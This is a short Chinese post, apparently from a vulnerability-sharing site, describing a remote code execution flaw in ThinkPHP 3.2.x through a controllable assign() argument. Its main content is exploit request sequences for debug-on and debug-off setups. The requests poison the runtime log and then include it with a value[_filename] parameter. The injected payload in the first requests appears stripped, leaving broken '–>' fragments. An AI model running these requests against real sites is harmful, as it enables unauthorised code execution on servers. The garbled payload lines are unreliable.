ThinkPHP3.2.x RCE-棉花糖会员站

## ThinkPHP3.2.x RCE

在ThinkPHP3.2.x框架的程序中，如果要在模板中输出变量，需要在控制器中把变量传递给模板，系统提供了assign方法对模板变量赋值，本漏洞的利用条件为assign方法的第一个变量可控。

Ver：

– ThinkPHP 3.2.X

Exp：
debug关闭：

“`
1、/index.php?m=–>
2、http://127.0.0.1/index.php?0=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_07_13.log
“`
debug开启：

“`
1、/index.php?m=Home&c=Index&a=index&test=–>
2、http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_07_13.log
“`

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

ThinkPHP3.2.x RCE

请登录后发表评论

1[投稿]某知识星球付费资源，价值120大洋

2某公众号的纯垃圾SRC知识库（他妈的又被割了）

3老外百万赏金猎人直播课录屏第七课